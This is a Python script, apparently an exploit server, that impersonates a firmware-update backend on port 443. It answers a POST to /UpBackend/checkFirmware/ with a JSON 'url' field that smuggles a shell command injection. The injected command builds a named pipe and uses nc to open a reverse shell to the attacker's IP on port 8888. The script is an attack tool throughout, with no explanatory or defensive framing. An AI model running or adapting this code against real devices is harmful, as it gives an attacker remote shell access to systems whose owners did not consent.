web_server.py

import ssl, sys
from http.server import HTTPServer, BaseHTTPRequestHandler

ip = ""

class CustomHandler(BaseHTTPRequestHandler):

        def do_GET(self):
                self.send_response(200)
                self.end_headers()
                self.wfile.write(b'Hello!')

        def do_POST(self):
                print("  [~] Got request: " + str(self.path))
                content_length = int(self.headers['Content-Length'])

                if str(self.path) == "/UpBackend/checkFirmware/":
                        self.send_response(200)
                        self.send_header('Content-Type', 'application/json')
                        self.end_headers()
                        response_str = '{"status":1,"errorCode":null,"message":null,"url":"; mknod /tmp/backpipe p; nc '+ \
                                        ip + ' 8888 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe)#"}';
                        self.wfile.write(response_str.encode(encoding='utf_8'))
                        print("[+] Payload sent, check if reverse shell spawned")
                        sys.exit(1)

ip = sys.argv[1]
handler = CustomHandler
httpd = HTTPServer(('0.0.0.0', 443), handler)
httpd.socket = ssl.wrap_socket(httpd.socket,
        certfile='./server.pem', server_side=True)
httpd.serve_forever()